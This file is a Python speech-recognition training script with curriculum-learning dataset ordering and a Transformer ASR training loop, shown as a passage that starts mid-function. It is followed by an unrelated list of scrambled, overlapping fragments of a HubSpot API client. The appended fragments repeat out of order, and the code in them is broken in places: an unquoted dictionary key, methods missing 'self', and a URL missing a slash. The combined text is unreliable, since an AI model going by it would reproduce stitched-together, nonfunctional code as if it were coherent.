                sign = 1 if ordering["order"] == "asc" else -1
                if ordering["key"] == "input_length":
                    res = self._input_length_comparator(key1, key2)
                else:
                    res = self._text_comparator(key1, key2)
                res = sign * res
                if res == 0:
                    continue
                else:
                    return res
            return res

        shuffled_data_ids = self._random_shuffle_data_ids(data_ids)
        sorted_data_ids = sorted(shuffled_data_ids, key=cmp_to_key(compare))
        weights = {}
        for index, id in enumerate(sorted_data_ids):
            weights[id] = index
        return weights

    def _input_length_comparator(self, key1, key2):
        """Compare two data points based on input length"""
        duration1 = float(self.data[key1]["duration"])
        duration2 = float(self.data[key2]["duration"])
        if duration1 > duration2:
            return 1
        elif duration1 < duration2:
            return -1
        else:
            return 0

    def _text_comparator(self, key1, key2):
        """Compare two data points based on their transcription text."""
        text1 = self.data[key1]["wrd"]
        text2 = self.data[key2]["wrd"]
        if text1 > text2:
            return 1
        elif text1 < text2:
            return -1
        else:
            return 0

    def _random_shuffle_data_ids(self, data_ids):
        """Randomly shuffle the dataset at the single data point level."""
        shuffled_ids = list(np.random.permutation(list(data_ids)))
        weights = {}
        for index, id in enumerate(shuffled_ids):
            weights[id] = index
        return weights

    def _random_shuffled_batches(
        self, weights=None, batch_size=8, reverse=False
    ):
        """Randomly shuffle the dataset at batch level"""
        data_ids = [
            did for did, _ in sorted(weights.items(), key=lambda x: x[1])
        ]
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.random.permutation(np.arange(batch_count)):
            start_index = int(batch) * batch_size
            end_index = min(start_index + batch_size, data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(data_ids), (
            "OOPS!! Batchwise sorting gone wrong."
        )
        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights

    def _reverse_sort_batches(self, weights=None, batch_size=8):
        """Reverse the order of the batches, keeping each batch intact."""
        data_ids = [
            did for did, _ in sorted(weights.items(), key=lambda x: x[1])
        ]
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        reversed_data_ids = []
        for batch in reversed(np.arange(batch_count)):
            start_index = int(batch) * batch_size
            end_index = min(start_index + batch_size, data_count)
            reversed_data_ids += data_ids[start_index:end_index]
        weights = {}
        for index, data_id in enumerate(reversed_data_ids):
            weights[data_id] = index
        return weights

    @staticmethod
    def _parse_ordering_info(dataset_order):
        """Takes the curriculum ordering specification as a string (e.g.
        "duration:asc,wrd:desc") and creates a list of dicts out of it."""
        ordering_info = []
        orderings = dataset_order.split(",")
        for order in orderings:
            if order.strip() == '':
                continue
            column, order = order.split(":")
            ordering_info.append({"key": column, "order": order})
        return ordering_info
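# The "random" batch selection above shuffles the dataset at batch level:
# utterances keep their curriculum-sorted neighbours (so batches stay
# length-homogeneous) while the order in which batches are visited is
# randomized. A minimal self-contained sketch of that idea; the function and
# variable names here are illustrative, not part of the recipe:

def shuffle_batches(sorted_ids, batch_size):
    """Keep batch membership from the sorted order, shuffle batch order."""
    batch_count = math.ceil(len(sorted_ids) / batch_size)
    shuffled = []
    for batch in np.random.permutation(np.arange(batch_count)):
        start = int(batch) * batch_size
        shuffled += sorted_ids[start:start + batch_size]
    assert len(shuffled) == len(sorted_ids)
    return shuffled

# e.g. with batch_size=4, ids [utt00..utt09] sorted by duration stay grouped
# as {utt00-utt03}, {utt04-utt07}, {utt08-utt09}, but the three groups are
# visited in a random order.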
class ASR(sb.core.Brain):
    """Brain subclass implementing the curriculum-learning training loop.

    Like the base class, it abstracts away the details of the data loops;
    the primary purpose of the `Brain` class is "fitting" a set of modules
    to a set of data. On top of the usual hooks, the following methods can
    be overridden:

    * ``fit_batch()``
    * ``evaluate_batch()``

    Arguments
    ---------
    modules : dict of str:torch.nn.Module pairs
        Passed to the optimizer by default if they have trainable
        parameters, and will have ``train()``/``eval()`` called on them.
    opt_class : torch.optim class
        A torch optimizer constructor.
    hparams : dict
        Each key:value pair is accessible with dot notation,
        e.g. self.hparams.model(x).
    run_opts : dict
        A set of options to change the runtime environment, including

        debug (bool)
            If ``True``, this will only iterate a few batches for all
            datasets, to ensure code runs without crashing.
        debug_batches (int)
            Number of batches to run in debug mode, Default ``2``.
        jit_module_keys (list of str)
            List of keys in modules that should be jit compiled.
        distributed_count (int)
            Number of devices to run on.

        The remaining run_opts of ``sb.core.Brain`` are all valid.
    checkpointer : speechbrain.utils.checkpoints.Checkpointer
        This will be used to load checkpoints, and will have the optimizer
        added to continue training if interrupted.
    inter_epoch_dataset_updation : bool
        Used in CL which takes feedback from the model and reshuffles the
        dataset between epochs. By default, False.
    sortagrad : int
        Number of epochs for which the curriculum-based dataset is used.
        It can take one of three values:
        * ``-1`` - Use curriculum learning for all epochs.
        * ``0`` - Disable curriculum learning.
        * ``n`` - Use curriculum learning for the first ``n`` epochs.
        Defaults to ``-1``.
    """

    def __init__(
        self,
        modules=None,
        opt_class=None,
        hparams=None,
        run_opts=None,
        checkpointer=None,
        inter_epoch_dataset_updation=False,
        sortagrad=-1,
    ):
        super().__init__(
            modules=modules,
            opt_class=opt_class,
            hparams=hparams,
            run_opts=run_opts,
            checkpointer=checkpointer,
        )
        # save attributes related to curriculum learning
        self.inter_epoch_dataset_updation = inter_epoch_dataset_updation
        self.sortagrad = sortagrad
        # create tensorboard summary writer
        self.tensorboard_writer = SummaryWriter(
            self.hparams.output_folder + "/tensorboard"
        )

    def compute_forward(self, batch, stage):
        """Forward computations from waveforms to output probabilities."""
        batch = batch.to(self.device)
        wavs, wav_lens = batch.sig
        tokens_bos, _ = batch.tokens_bos

        # Add environmental corruption during training (doubles the batch)
        if stage == sb.Stage.TRAIN and hasattr(self.modules, "env_corrupt"):
            wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
            wavs = torch.cat([wavs, wavs_noise], dim=0)
            wav_lens = torch.cat([wav_lens, wav_lens])
            tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)

        src = self.modules.CNN(wavs)
        enc_out, pred = self.modules.Transformer(
            src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index
        )

        # output layer for ctc log-probabilities
        logits = self.modules.ctc_lin(enc_out)
        p_ctc = self.hparams.log_softmax(logits)

        # output layer for seq2seq log-probabilities
        pred = self.modules.seq_lin(pred)
        p_seq = self.hparams.log_softmax(pred)

        # Compute outputs
        hyps = None
        if stage == sb.Stage.VALID:
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch % self.hparams.valid_search_interval == 0:
                # for the sake of efficiency, we only perform beamsearch with
                # limited capacity and no LM to give user some idea of
                # how the AM is doing
                hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)
        elif stage == sb.Stage.TEST:
            hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)

        return p_ctc, p_seq, wav_lens, hyps

    def compute_objectives(self, predictions, batch, stage):
        """Computes the loss (CTC + NLL) given predictions and targets."""
        p_ctc, p_seq, wav_lens, hyps = predictions

        ids = batch.id
        tokens_eos, tokens_eos_lens = batch.tokens_eos
        tokens, tokens_lens = batch.tokens

        # Double the targets to match the env_corrupt-doubled batch
        if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
            tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)
            tokens_eos_lens = torch.cat(
                [tokens_eos_lens, tokens_eos_lens], dim=0
            )
            tokens = torch.cat([tokens, tokens], dim=0)
            tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)

        loss_seq = self.hparams.seq_cost(
            p_seq, tokens_eos, length=tokens_eos_lens
        )
        loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)
        loss = (
            self.hparams.ctc_weight * loss_ctc
            + (1 - self.hparams.ctc_weight) * loss_seq
        )

        if stage != sb.Stage.TRAIN:
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if (
                current_epoch % valid_search_interval == 0
                or stage == sb.Stage.TEST
            ):
                # Decode token terms to words
                predicted_words = [
                    self.tokenizer.decode_ids(utt_seq).split(" ")
                    for utt_seq in hyps
                ]
                target_words = [wrd.split(" ") for wrd in batch.wrd]
                self.wer_metric.append(ids, predicted_words, target_words)

            # compute the accuracy of the one-step-forward prediction
            self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)
        return loss, loss_ctc, loss_seq

    def fit_batch(self, batch):
        """Train the parameters given a single batch in input"""
        # check if we need to switch optimizer
        # if so change the optimizer from Adam to SGD
        self.check_and_reset_optimizer()

        predictions = self.compute_forward(batch, sb.Stage.TRAIN)
        loss, loss_ctc, loss_seq = self.compute_objectives(
            predictions, batch, sb.Stage.TRAIN
        )

        # normalize the loss by gradient_accumulation step
        (loss / self.hparams.gradient_accumulation).backward()

        if self.step % self.hparams.gradient_accumulation == 0:
            # gradient clipping & early stop if loss is not finite
            self.check_gradients(loss)
            self.optimizer.step()
            self.optimizer.zero_grad()

            # anneal lr every update
            self.hparams.noam_annealing(self.optimizer)

        return loss.detach(), loss_ctc.detach(), loss_seq.detach()

    def evaluate_batch(self, batch, stage):
        """Computations needed for validation/test batches"""
        with torch.no_grad():
            predictions = self.compute_forward(batch, stage=stage)
            loss, _, _ = self.compute_objectives(
                predictions, batch, stage=stage
            )
        return loss.detach()

    def on_stage_start(self, stage, epoch):
        """Gets called at the beginning of each epoch"""
        if stage != sb.Stage.TRAIN:
            self.acc_metric = self.hparams.acc_computer()
            self.wer_metric = self.hparams.error_rate_computer()

    def on_stage_end(self, stage, stage_loss, epoch):
        """Gets called at the end of a epoch."""
        stage_stats = {"loss": stage_loss}
        if stage == sb.Stage.TRAIN:
            self.train_stats = stage_stats
            self.recreate_train_dataset(
                epoch=self.hparams.epoch_counter.current
            )
        else:
            stage_stats["ACC"] = self.acc_metric.summarize()
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if (
                current_epoch % valid_search_interval == 0
                or stage == sb.Stage.TEST
            ):
                stage_stats["WER"] = self.wer_metric.summarize("error_rate")

        # log stats and save checkpoint at end-of-epoch
        if (
            stage == sb.Stage.VALID
            and sb.utils.distributed.if_main_process()
        ):
            # report different epoch stages according to current stage
            lr = self.hparams.noam_annealing.current_lr
            steps = self.hparams.noam_annealing.n_steps
            optimizer = self.optimizer.__class__.__name__
            epoch_stats = {
                "epoch": epoch,
                "lr": lr,
                "steps": steps,
                "optimizer": optimizer,
            }
            self.hparams.train_logger.log_stats(
                stats_meta=epoch_stats,
                train_stats=self.train_stats,
                valid_stats=stage_stats,
            )
            self.checkpointer.save_and_keep_only(
                meta={"ACC": stage_stats["ACC"], "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=5,
            )
        elif stage == sb.Stage.TEST:
            self.hparams.train_logger.log_stats(
                stats_meta={
                    "Epoch loaded": self.hparams.epoch_counter.current
                },
                test_stats=stage_stats,
            )
            with open(self.hparams.wer_file, "w") as w:
                self.wer_metric.write_stats(w)
            # save the averaged checkpoint at the end of the evaluation stage
            self.checkpointer.save_and_keep_only(
                meta={"ACC": 1.1, "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=1,
            )

    def recreate_train_dataset(self, epoch):
        """Reorder the training set for the next epoch when curriculum
        learning is active for that epoch."""
        if not self.inter_epoch_dataset_updation:
            return
        ...

    def on_evaluate_start(self, max_key=None, min_key=None):
        """perform checkpoint averge if needed"""
        super().on_evaluate_start()
        ckpts = self.checkpointer.find_checkpoints(
            max_key=max_key, min_key=min_key
        )
        ckpt = sb.utils.checkpoints.average_checkpoints(
            ckpts, recoverable_name="model", device=self.device
        )
        self.hparams.model.load_state_dict(ckpt, strict=True)
        self.hparams.model.eval()

    def on_fit_start(self):
        """Initialize the right optimizer on the training start"""
        super().on_fit_start()

        # if the model is resumed from stage two, reinitialize the optimizer
        current_epoch = self.hparams.epoch_counter.current
        current_optimizer = self.optimizer
        if current_epoch > self.hparams.stage_one_epochs:
            del self.optimizer
            self.optimizer = self.hparams.SGD(self.modules.parameters())

            # Load latest checkpoint to resume training if interrupted
            if self.checkpointer is not None:
                # do not reload the weights if training is interrupted
                # right before stage 2
                group = current_optimizer.param_groups[0]
                if "momentum" not in group:
                    return
                self.checkpointer.recover_if_possible(
                    device=torch.device(self.device)
                )

    def fit(
        self,
        epoch_counter,
        train_set,
        valid_set=None,
        progressbar=None,
        train_loader_kwargs={},
        valid_loader_kwargs={},
    ):
        """Iterate epochs and datasets to improve the objective.

        Arguments
        ---------
        epoch_counter : iterable
            Each call should return an integer indicating the epoch count.
        train_set : Dataset, DataLoader
            If a Dataset is given, a DataLoader is automatically created.
            If a DataLoader is given, it is used directly.
        valid_set : Dataset, DataLoader
            If a Dataset is given, a DataLoader is automatically created.
            If a DataLoader is given, it is used directly.
        train_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for the train_loader.
        valid_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for the valid_loader.
        progressbar : bool
            Whether to display the progress of each epoch in a progressbar.
        """
        if not (
            isinstance(train_set, DataLoader)
            or isinstance(train_set, LoopedLoader)
        ):
            train_set = self.make_dataloader(
                train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs
            )
        if valid_set is not None and not (
            isinstance(valid_set, DataLoader)
            or isinstance(valid_set, LoopedLoader)
        ):
            valid_set = self.make_dataloader(
                valid_set,
                stage=sb.Stage.VALID,
                ckpt_prefix=None,
                **valid_loader_kwargs,
            )

        self.on_fit_start()
        self.train_set = train_set

        if progressbar is None:
            progressbar = not self.noprogressbar

        # Iterate epochs
        for epoch in epoch_counter:
            # Training stage
            self.on_stage_start(sb.Stage.TRAIN, epoch)
            self.modules.train()

            self.step = 0
            if self.train_sampler is not None and hasattr(
                self.train_sampler, "set_epoch"
            ):
                self.train_sampler.set_epoch(epoch)

            # Time since last intra-epoch checkpoint
            last_ckpt_time = time.time()

            # Only show progressbar if requested and main_process
            enable = progressbar and sb.utils.distributed.if_main_process()
            total_steps = len(self.train_set)
            completed_steps = (epoch - 1) * total_steps
            with tqdm(
                self.train_set,
                initial=self.step,
                dynamic_ncols=True,
                disable=not enable,
            ) as t:
                for batch in t:
                    self.step += 1
                    global_step = completed_steps + self.step
                    loss, loss_ctc, loss_seq = self.fit_batch(batch)
                    self.avg_train_loss = self.update_average(
                        loss, self.avg_train_loss
                    )
                    t.set_postfix(train_loss=self.avg_train_loss)

                    # Write training summary to tensorboard
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/loss", loss, global_step
                    )
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/ctc_loss", loss_ctc, global_step
                    )
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/att_loss", loss_seq, global_step
                    )

                    # Debug mode only runs a few batches
                    if self.debug and self.step == self.debug_batches:
                        break

                    if (
                        self.checkpointer is not None
                        and self.ckpt_interval_minutes > 0
                        and time.time() - last_ckpt_time
                        >= self.ckpt_interval_minutes * 60.0
                    ):
                        run_on_main(self._save_intra_epoch_ckpt)
                        last_ckpt_time = time.time()

            # Run train "on_stage_end" on all processes
            self.on_stage_end(sb.Stage.TRAIN, self.avg_train_loss, epoch)
            self.avg_train_loss = 0.0
            self.step = 0

            # Validation stage
            if valid_set is not None:
                self.on_stage_start(sb.Stage.VALID, epoch)
                self.modules.eval()
                avg_valid_loss = 0.0
                with torch.no_grad():
                    for batch in tqdm(
                        valid_set, dynamic_ncols=True, disable=not enable
                    ):
                        self.step += 1
                        loss = self.evaluate_batch(batch, stage=sb.Stage.VALID)
                        avg_valid_loss = self.update_average(
                            loss, avg_valid_loss
                        )
                        if self.debug and self.step == self.debug_batches:
                            break
                    self.step = 0
                    run_on_main(
                        self.on_stage_end,
                        args=[sb.Stage.VALID, avg_valid_loss, epoch],
                    )

            # Debug mode only runs a few epochs
            if self.debug and epoch == self.debug_epochs:
                break


def dataio_prepare(hparams):
    """This function prepares the datasets to be used in the brain class.
    It also defines the data processing pipeline through user-defined
    functions."""
    data_folder = hparams["data_folder"]

    ordering_info = hparams["ordering"]
    batch_selection = hparams["batch_selection"]
    batch_size = int(hparams["batch_size"])

    train_data = CurriculumDataset.from_csv(
        csv_path=hparams["train_csv"],
        replacements={"data_root": data_folder},
    )
    train_data = train_data.filtered_sorted(
        ordering_info=ordering_info,
        batch_selection=batch_selection,
        batch_size=batch_size,
    )
    # when sorting do not shuffle in dataloader! otherwise it is pointless
    hparams["train_dataloader_opts"]["shuffle"] = False

    valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
        csv_path=hparams["valid_csv"],
        replacements={"data_root": data_folder},
    )

    test_datasets = {}
    for csv_file in hparams["test_csv"]:
        name = Path(csv_file).stem
        test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv(
            csv_path=csv_file, replacements={"data_root": data_folder}
        )

    datasets = [train_data, valid_data] + [
        i for k, i in test_datasets.items()
    ]

    # We get the tokenizer as we need it to encode the labels when creating
    # mini-batches.
    tokenizer = hparams["tokenizer"]

    # 2. Define audio pipeline:
    @sb.utils.data_pipeline.takes("wav")
    @sb.utils.data_pipeline.provides("sig")
    def audio_pipeline(wav):
        sig = sb.dataio.dataio.read_audio(wav)
        return sig

    sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline)

    # 3. Define text pipeline:
    @sb.utils.data_pipeline.takes("wrd")
    @sb.utils.data_pipeline.provides(
        "wrd", "tokens_list", "tokens_bos", "tokens_eos", "tokens"
    )
    def text_pipeline(wrd):
        yield wrd
        tokens_list = tokenizer.encode_as_ids(wrd)
        yield tokens_list
        tokens_bos = torch.LongTensor([hparams["bos_index"]] + (tokens_list))
        yield tokens_bos
        tokens_eos = torch.LongTensor(tokens_list + [hparams["eos_index"]])
        yield tokens_eos
        tokens = torch.LongTensor(tokens_list)
        yield tokens

    sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline)

    # 4. Set output:
    sb.dataio.dataset.set_output_keys(
        datasets,
        ["id", "sig", "wrd", "tokens_bos", "tokens_eos", "tokens", "duration"],
    )
    return train_data, valid_data, test_datasets, tokenizer


if __name__ == "__main__":
    # CLI:
    hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])
    with open(hparams_file) as fin:
        hparams = load_hyperpyyaml(fin, overrides)

    # If distributed_launch=True then
    # create ddp_group with the right communication protocol
    sb.utils.distributed.ddp_init_group(run_opts)

    # 1. Dataset prep (parsing Librispeech); arguments come from the yaml.
    ...

    # We download the pretrained LM from HuggingFace (or elsewhere depending
    # on the path given in the yaml file); the tokenizer is loaded with it.
    run_on_main(hparams["pretrainer"].collect_files)
    hparams["pretrainer"].load_collected(device=run_opts["device"])

    # here we create the dataset objects as well as tokenization and encoding
    train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams)

    # Trainer initialization
    asr_brain = ASR(
        modules=hparams["modules"],
        opt_class=hparams["Adam"],
        hparams=hparams,
        run_opts=run_opts,
        checkpointer=hparams["checkpointer"],
    )

    # adding objects to trainer:
    asr_brain.tokenizer = hparams["tokenizer"]

    # Training
    asr_brain.fit(
        asr_brain.hparams.epoch_counter,
        train_data,
        valid_data,
        train_loader_kwargs=hparams["train_dataloader_opts"],
        valid_loader_kwargs=hparams["valid_dataloader_opts"],
    )

    # Testing
    for k in test_datasets.keys():  # keys are test_clean, test_other etc.
        asr_brain.hparams.wer_file = os.path.join(
            hparams["output_folder"], "wer_{}.txt".format(k)
        )
        asr_brain.evaluate(
            test_datasets[k],
            max_key="ACC",
            test_loader_kwargs=hparams["test_dataloader_opts"],
        )
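# For reference, this is how an `ordering` string from the yaml (for example
# "duration:asc,wrd:desc") drives the comparator chain used by the curriculum
# dataset above. The sketch is self-contained and uses toy data; `records`
# and the key names are illustrative only, not part of the recipe:

from functools import cmp_to_key


def parse_ordering(spec):
    return [
        {"key": key, "order": order}
        for key, order in (
            item.split(":") for item in spec.split(",") if item.strip()
        )
    ]


def make_comparator(records, ordering):
    def compare(id1, id2):
        for rule in ordering:
            sign = 1 if rule["order"] == "asc" else -1
            a, b = records[id1][rule["key"]], records[id2][rule["key"]]
            if a != b:
                return sign * (1 if a > b else -1)
        return 0

    return compare

# e.g. with records = {"utt1": {"duration": 2.0}, "utt2": {"duration": 1.0},
# "utt3": {"duration": 3.0}} and ordering = parse_ordering("duration:asc"),
# sorted(records, key=cmp_to_key(make_comparator(records, ordering)))
# returns ["utt2", "utt1", "utt3"]: the shortest utterances are seen first.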
[ "pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' + list_id + '/contacts/all'", "} payload = ujson.dumps({ vids: array_of_ids }) response = requests.request( 'POST', url, data=payload,", "deal def get_deal_owner_by_id(): # check deal id or owner id pass def create_deal():", "self.hub_id = hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists' pass", "querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': True,", "querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request(", "'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', } response =", ") print(response.text) def create_dynamic_list(): url = self._lists_url querystring = { 'hapikey': '<KEY>', }", "##### CONTACT APIS ##### def get_contact_by_id(): pass # read all companies def get_all_contacts():", "params=querystring ) print(response.text) # create contact def create_contact(): pass # update contact def", "params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url + '/' +", "create contact def create_contact(): pass # update contact def update_contact(): pass # deleting", "create_dynamic_list(): url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({", "check deal id or owner id pass def create_deal(): pass def associate_contact_to_deal(): pass", "def get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id():", "def add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT APIS ##### def get_contact_by_id(): pass", "} payload = ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [], })", "def get_all_static_lists(): url = self._lists_url querystring = { 'offset': '0', 'count': '10', 'hapikey':", "False, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url, data=payload, params=querystring", "} response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_all_dynamic_lists(): url =", "add_contacts_in_a_static_list(self, list_id, array_of_ids): url = self._lists_url + '/' + list_id + '/add' querystring", "data=payload, params=querystring ) print(response.text) pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url =", "import ujson # from b2b_app.config import CONFIG class Hubspot: def __init__(self, hub_id, refresh_token):", "CONTACT APIS ##### def get_contact_by_id(): pass # read all companies def get_all_contacts(): url", "def update_contact(): pass # deleting contact def delete_contact(): pass def get_associated_deals_for_contact(): pass #####", "def get_account_by_id(): pass # read all companies def get_all_accounts(): pass # create company", "get_account_by_id(): pass # read all companies def get_all_accounts(): pass # create company in", "'hapikey': '<KEY>', } payload = ujson.dumps({ vids: array_of_ids }) response = requests.request( 'POST',", ") print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring = { 'hapikey': '<KEY>',", "def update_account(): # pass def add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT APIS", "= self._lists_url + '/dynamic' querystring = { 'offset': '0', 'count': '10', 
'hapikey': '<KEY>',", "'0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring )", "data=payload, params=querystring ) print(response.text) ##### DEAL APIS ##### # create deal def get_deal_owner_by_id():", "list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url,", "pass # read all companies def get_all_contacts(): url = self._lists_url + 'all/contacts/all' querystring", "list_id querystring = { 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring", "pass def associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner(): # yes pass def", "def update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass # read all", "delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' + list_id +", "get_contact_by_id(): pass # read all companies def get_all_contacts(): url = self._lists_url + 'all/contacts/all'", "def get_associated_deals_for_account(): pass ##### CONTACT APIS ##### def get_contact_by_id(): pass # read all", "= requests.request( 'GET', url, params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url =", "= { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId':", "print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring = { 'hapikey': '<KEY>', }", "'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST',", "self._lists_url + '/' + list_id + '/add' querystring = { 'hapikey': '<KEY>', }", "'POST', url, data=payload, params=querystring ) print(response.text) def create_dynamic_list(): url = self._lists_url querystring =", "create_static_list(self, list_name): url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload =", "} payload = ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], })", "[], }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) def create_dynamic_list():", "pass def update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass # read", "def create_account(): pass # update company def update_account(): # pass def add_contact_to_account(): pass", "hubspot def create_account(): pass # update company def update_account(): # pass def add_contact_to_account():", "'GET', url, params=querystring ) print(response.text) def get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring", "data=payload, params=querystring ) print(response.text) def create_dynamic_list(): url = self._lists_url querystring = { 'hapikey':", "self._lists_url querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response =", "get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' + list_id + '/contacts/all' querystring =", "= requests.request( 'GET', url, params=querystring ) print(response.text) def create_static_list(self, list_name): url = self._lists_url", "# deleting contact def delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS APIS #####", "'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_all_dynamic_lists():", "pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' +", "pass # read all companies def 
get_all_accounts(): pass # create company in hubspot", "querystring = { 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring )", "5225356, 'filters': [], }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text)", "'<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [],", ") print(response.text) pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url +", "url, params=querystring ) print(response.text) def get_list_by_id(self, list_id): url = self._lists_url + '/' +", "'dynamic': False, 'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url, data=payload,", "get_list_by_id(self, list_id): url = self._lists_url + '/' + list_id querystring = { 'hapikey':", "= ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters': [], }) response =", "# from b2b_app.config import CONFIG class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id =", "def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' + list_id", "querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': False,", "class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token self.access_token", "url, params=querystring ) print(response.text) def get_all_dynamic_lists(): url = self._lists_url + '/dynamic' querystring =", "= self._lists_url + 'all/contacts/all' querystring = { 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>',", "def delete_contact(): pass def get_associated_deals_for_contact(): pass ##### LISTS APIS ##### def get_all_static_lists(): url", "b2b_app.config import CONFIG class Hubspot: def __init__(self, hub_id, refresh_token): self.hub_id = hub_id self.refresh_token", "associate_account_to_deal(): pass def dissociate_contact_from_deal(): pass def find_deal_owner(): # yes pass def test(): pass", "payload = ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters': [], }) response", "update_access_token(): pass ##### ACCOUNT APIS ##### def get_account_by_id(): pass # read all companies", "##### LISTS APIS ##### def get_all_static_lists(): url = self._lists_url querystring = { 'offset':", "= self._lists_url + '/' + list_id querystring = { 'hapikey': '<KEY>', } response", "'GET', url, params=querystring ) print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring =", "'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS #####", "'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring", "'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': False, 'portalId': 5225356, 'filters':", "'/add' querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ vids: array_of_ids })", "def get_contact_by_id(): pass # read all companies def get_all_contacts(): url = self._lists_url +", "get_associated_deals_for_contact(): pass ##### LISTS APIS ##### def get_all_static_lists(): url = self._lists_url querystring =", "} response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_list_by_id(self, list_id): url", "all companies def get_all_accounts(): pass # create company in hubspot def create_account(): pass", "APIS ##### def 
